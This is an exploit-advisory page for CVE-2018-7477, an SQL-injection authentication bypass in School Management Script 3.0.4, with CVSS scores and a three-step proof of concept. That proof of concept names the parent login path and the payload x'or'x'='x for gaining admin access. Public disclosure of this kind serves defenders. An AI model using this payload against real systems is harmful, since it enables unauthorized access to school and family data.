School Management Script 3.0.4 Authentication Bypass

2018.02.28
Risk: Medium
Local: No
Remote: No
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: SQL Injection exists in PHP Scripts Mall School Management Script 3.0.4. # Date: 26/02/2018 # Exploit Author: Samiran Santra # Vendor Homepage: https://www.phpscriptsmall.com # Software Link: https://www.phpscriptsmall.com/product/school-management-system # Version: v3.0.4 #Tested on: Windows # Website: https://indiancybersecuritysolutions.com/ # CVE: CVE-2018-7477 # Category: webapps Proof of Concept 1.First go to this link- http://localhost/PATH/parents/Parent_module/parent_login.php 2.In Username and Password filed just type sql-injection cheat-code (x'or'x'='x) 3.Now you can successfully login as a admin user


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top